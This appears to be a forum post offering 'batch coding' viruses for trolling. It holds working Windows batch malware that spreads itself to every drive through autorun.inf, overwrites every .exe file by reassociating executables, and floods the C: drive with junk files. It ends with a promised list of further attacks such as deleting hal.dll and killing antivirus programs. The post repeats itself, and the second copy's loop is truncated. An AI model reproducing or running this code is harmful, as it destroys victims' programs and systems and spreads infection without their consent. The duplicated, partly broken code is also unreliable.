Best Known Batch Coding Programms (.BAT viruses ... best way to troll deeply):
1.Infecting All drives :
@ echo off
rem ------------------------------ ---
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O ,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ------------------------------ ---
2.Infecting all .exe in the computer
@ echo off
rem ------------------------------ ---
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ------------------------------ ---
3.SPAM local disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
rem ------------------------------ ---
soon Upcoming tut:
*Spam Printer
*Swap Mouse button
*Crash computer
*Delete hal.dll
*Delete all .exe files in the computer
*Disable internet
*Disable Keyboard
*Disable Mouse
*Kill Antivirus(avg ,k7,kaspersky,bitdefender,mcaf e,security essentials,norton,panda,more)
if you have coding for any above reply
1.Infecting All drives :
@ echo off
rem ------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ------------------------------
2.Infecting all .exe in the computer
@ echo off
rem ------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ------------------------------
3.SPAM local disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
rem ------------------------------
soon Upcoming tut:
*Spam Printer
*Swap Mouse button
*Crash computer
*Delete hal.dll
*Delete all .exe files in the computer
*Disable internet
*Disable Keyboard
*Disable Mouse
*Kill Antivirus(avg ,k7,kaspersky,bitdefender,mcaf
if you have coding for any above reply
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